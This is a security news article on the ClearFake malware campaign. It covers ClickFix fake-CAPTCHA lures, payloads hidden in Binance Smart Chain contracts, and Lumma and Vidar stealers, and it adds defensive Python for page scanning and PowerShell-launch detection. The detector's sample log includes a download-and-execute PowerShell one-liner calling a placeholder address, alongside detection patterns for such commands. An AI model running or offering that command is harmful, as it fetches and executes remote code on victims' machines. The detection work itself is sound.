Cybersecurity analysts have raised concerns over the latest ClearFake malware variant, which leverages Web3 capabilities to execute malicious operations using blockchain technology. Reports indicate that the malware utilizes smart contracts on the blockchain to store and deliver malicious scripts, resources, and payloads, complicating detection and mitigation efforts.
Tactics and Techniques Behind ClearFake
According to cybersecurity platform Sekoia.io, ClearFake primarily targets compromised WordPress websites to propagate its malware. The malware campaign employs a social engineering technique known as ClickFix, tricking users into executing malicious PowerShell scripts on their systems. Victims are typically shown a deceptive error message urging them to manually copy and run the malicious code via their Windows terminal.
Initially detected in July 2023, ClearFake previously lured users through fake web browser update pages. However, reports suggest that by May 2024, the threat actors shifted to using ClickFix. By mid-2024, approximately 200,000 unique users had accessed ClearFake-compromised websites, indicating the scale of the threat.
Use of Blockchain for Malware Distribution
The latest version of ClearFake, traced back to December 2024, has introduced new phishing tactics, including fake CAPTCHA pages and the integration of JavaScript frameworks. In a more alarming development, cybercriminals have been utilizing Binance Smart Chain (BSC) smart contracts to deliver various malware components, including ClickFix payloads.
Smart contracts, normally used to carry out transactions on the blockchain, are abused in this case as storage for malicious files. Attackers embed the files in the “Input Data” field of the smart contracts, and the loader retrieves them at attack time. Because data written to the chain cannot be removed, this gives the payloads persistent hosting that is out of reach of traditional takedown efforts.
When a user visits a compromised site, JavaScript embedded in the page loads specific Application Binary Interfaces (ABIs) and uses them to interact with Ethereum-compatible smart contracts. An ABI describes the contract’s functions and data structures, which is what the malware needs in order to call the contract and retrieve encrypted files, including malicious HTML and JavaScript payloads.
ClearFake’s malicious files are often hosted on Cloudflare Pages. The malware retrieves decryption keys from multiple Ethereum wallets, ensuring redundancy and making its takedown more challenging.
EtherHiding: Evasion Through Blockchain
The technique used by ClearFake to obscure malicious activities is referred to as EtherHiding. This approach allows cybercriminals to store malicious code on blockchain platforms like Ethereum and BSC. ClearFake previously applied EtherHiding on a smaller scale in October 2023, fetching a single malicious JavaScript file from its Ethereum address. The technique effectively bypasses traditional security measures, as blockchain-stored data remains immutable.
The continued use of EtherHiding by ClearFake highlights its adaptability and resilience. Security experts warn that this method makes it harder for cybersecurity teams to identify and eliminate the malware.
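The two building blocks a defender runs into when triaging an EtherHiding-style page are the ones described above: the page's JavaScript that points at a public RPC endpoint, an ABI and a contract address, and the ABI-encoded string the contract call returns (or the string stored in a transaction's input data). The following Python is an added example, not code from Sekoia.io or from the ClearFake campaign. It scans page source for those indicators and decodes a single ABI-encoded `string` from either an `eth_call` result or a transaction's input data. The indicator patterns (the `bsc-dataseed.binance.org` RPC host, the `web3`/`ethers` library names, a `view` function in the ABI) are assumptions about what such a loader typically contains; the sample page, the contract address and the hex blobs are constructed for the demo.

```python
"""Static triage of a web page for EtherHiding-style indicators, plus
ABI decoding of the string payloads such a loader fetches.

Added example; not code from Sekoia.io or from ClearFake. The sample page
and the hex data below are constructed for the demonstration."""
import re

# Indicator patterns (assumption: the markers a defender would look for;
# a real page may use another RPC provider or a bundled library).
INDICATORS = {
    "bsc_rpc": re.compile(r"bsc-dataseed\d*\.binance\.org", re.I),
    "eth_call": re.compile(r"\beth_call\b"),
    "web3_lib": re.compile(r"\b(?:web3|ethers)\b", re.I),
    "contract_addr": re.compile(r"0x[0-9a-fA-F]{40}\b"),
    "view_abi": re.compile(r'"stateMutability"\s*:\s*"view"'),
}


def scan_page(html: str) -> dict:
    """Return which indicators matched and the contract addresses seen."""
    hits = {name: bool(rx.search(html)) for name, rx in INDICATORS.items()}
    hits["addresses"] = sorted(set(INDICATORS["contract_addr"].findall(html)))
    # Require an address AND an RPC/ABI marker: a lone 0x address also
    # appears on legitimate dapp pages and in ordinary analytics snippets.
    hits["suspicious"] = hits["contract_addr"] and (
        hits["bsc_rpc"] or hits["eth_call"] or hits["view_abi"]
    )
    return hits


def decode_abi_string(hexdata: str, skip_selector: bool = False) -> str:
    """Decode one ABI-encoded `string`.

    Works on an eth_call result (skip_selector=False) and on a transaction's
    input data (skip_selector=True drops the 4-byte function selector that
    precedes the encoded arguments)."""
    raw = bytes.fromhex(hexdata[2:] if hexdata.startswith("0x") else hexdata)
    if skip_selector:
        raw = raw[4:]
    # Head word: byte offset of the dynamic data, relative to the argument start.
    offset = int.from_bytes(raw[0:32], "big")
    # At the offset: 32-byte length, then the bytes padded to a 32-byte boundary.
    length = int.from_bytes(raw[offset:offset + 32], "big")
    return raw[offset + 32:offset + 32 + length].decode("utf-8", errors="replace")


def encode_abi_string(s: str, selector: bytes = b"") -> str:
    """Inverse of decode_abi_string; used here only to build sample data."""
    data = s.encode()
    padded = data + b"\x00" * ((32 - len(data) % 32) % 32)
    body = (32).to_bytes(32, "big") + len(data).to_bytes(32, "big") + padded
    return "0x" + (selector + body).hex()


# Constructed sample page with the three markers together (address is a dummy).
SAMPLE_PAGE = """<html><script src="https://cdn.example.invalid/web3.min.js"></script>
<script>
const abi=[{"inputs":[],"name":"get","outputs":[{"type":"string"}],
            "stateMutability":"view","type":"function"}];
const w=new Web3("https://bsc-dataseed.binance.org/");
const c=new w.eth.Contract(abi,"0x1111111111111111111111111111111111111111");
c.methods.get().call().then(handle);
</script></html>"""

# Constructed eth_call result: offset 0x20, length 5, "hello" padded.
SAMPLE_RESULT = "0x" + "00" * 31 + "20" + "00" * 31 + "05" + "68656c6c6f" + "00" * 27

if __name__ == "__main__":
    print(scan_page(SAMPLE_PAGE))
    print(decode_abi_string(SAMPLE_RESULT))
```

In practice the page scan is the cheap first pass over crawled HTML; the decoder is for the analyst who has captured the RPC response (or pulled the transaction input from a block explorer) and wants the stored script back out in readable form.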
Social Engineering and Malware Deployment
The updated phishing tactics used by ClearFake involve fake CAPTCHA pages resembling Cloudflare Turnstile or Google reCAPTCHA. Victims attempting to pass these CAPTCHAs are shown deceptive error messages suggesting abnormal web traffic. They are then prompted to run PowerShell commands under the pretense of resolving the issue.
Upon execution, the malicious commands download and run additional payloads, including Emmental Loader and Lumma Stealer. In some cases, the Vidar Stealer malware is deployed using basic PowerShell loaders. These payloads are designed to extract sensitive information, including login credentials and financial data.
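On the endpoint, the ClickFix step above leaves a characteristic trace: a PowerShell process started by the user's own shell, with a command line that downloads and executes something. The following Python is an added example, not tooling from Sekoia.io, that scores constructed process-creation records against that pattern. The record format (timestamp, parent image, image, command line separated by `|`), the set of interactive parent processes and the command-line heuristics are assumptions for the demo; the log lines and the 198.51.100.7 address are constructed.

```python
"""Score process-creation records for the ClickFix pattern: PowerShell
launched from an interactive shell with download-and-execute arguments.

Added example; not Sekoia.io tooling. Record format, parent list and
heuristics are assumptions; all sample records are constructed."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    ts: str
    parent: str
    image: str
    cmdline: str


def parse_event(line: str) -> ProcEvent:
    """Parse 'ts|parent_image|image|command_line' (constructed format)."""
    ts, parent, image, cmdline = line.split("|", 3)
    return ProcEvent(ts, parent.lower(), image.lower(), cmdline)


# Parents that mean a human typed or pasted the command (assumption).
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "windowsterminal.exe"}

# Command-line heuristics; each match adds one point.
SUSPICIOUS_ARGS = [
    (re.compile(r"-(?:w|win|windowstyle)\s+hidden", re.I), "hidden window"),
    (re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I), "encoded command"),
    (re.compile(r"\b(?:iwr|invoke-webrequest|downloadstring|downloadfile|curl)\b", re.I), "web download"),
    (re.compile(r"\b(?:iex|invoke-expression)\b", re.I), "inline execution"),
    (re.compile(r"\bmshta\b", re.I), "mshta"),
]


def score_event(ev: ProcEvent):
    """Return (score, reasons) for one event; non-PowerShell images score 0."""
    reasons = []
    if ev.image not in ("powershell.exe", "pwsh.exe"):
        return 0, reasons
    if ev.parent in INTERACTIVE_PARENTS:
        reasons.append("launched from user shell: " + ev.parent)
    for rx, label in SUSPICIOUS_ARGS:
        if rx.search(ev.cmdline):
            reasons.append(label)
    return len(reasons), reasons


def find_clickfix_candidates(lines, threshold: int = 3):
    """Return (ts, score, reasons) for records at or above the threshold."""
    out = []
    for line in lines:
        ev = parse_event(line)
        score, reasons = score_event(ev)
        if score >= threshold:
            out.append((ev.ts, score, reasons))
    return out


# Constructed records: one ClickFix-style launch, one build script, one
# plain interactive shell, one service-launched encoded command.
SAMPLE_EVENTS = [
    '2025-02-24T10:01:02Z|explorer.exe|powershell.exe|powershell -w hidden -c "iex (iwr http://198.51.100.7/a)"',
    "2025-02-24T10:02:11Z|code.exe|powershell.exe|powershell -File build.ps1",
    "2025-02-24T10:03:40Z|explorer.exe|powershell.exe|powershell",
    "2025-02-24T10:05:09Z|services.exe|powershell.exe|powershell -enc QQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQA=",
]

if __name__ == "__main__":
    for ts, score, reasons in find_clickfix_candidates(SAMPLE_EVENTS):
        print(ts, score, reasons)
```

The threshold is deliberately above one point so that a developer's build script or an administrator opening a shell does not fire; the interactive parent combined with download and execute arguments is what distinguishes a pasted ClickFix command. If the user pastes into an already open PowerShell window, the new process may be the downloaded loader itself rather than a fresh powershell.exe, so the same heuristics are worth applying to children of interactive PowerShell processes as well.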
Scale of Impact and Detection Efforts
By tracking wallet addresses associated with the ClearFake campaign, Sekoia.io analysts conducted scans using Censys and identified over 9,300 compromised websites as of February 24, 2025. This substantial network of affected sites underlines the extensive reach of the malware campaign.
Cybersecurity experts have noted the advancements in ClearFake’s use of blockchain for malicious purposes. These recent developments, including the expanded implementation of EtherHiding, were previously documented by independent researcher Marek Szustak in January 2025.
Security professionals continue to recommend vigilance against such attacks, advising users to avoid executing unfamiliar commands and implement robust cybersecurity measures to mitigate risks.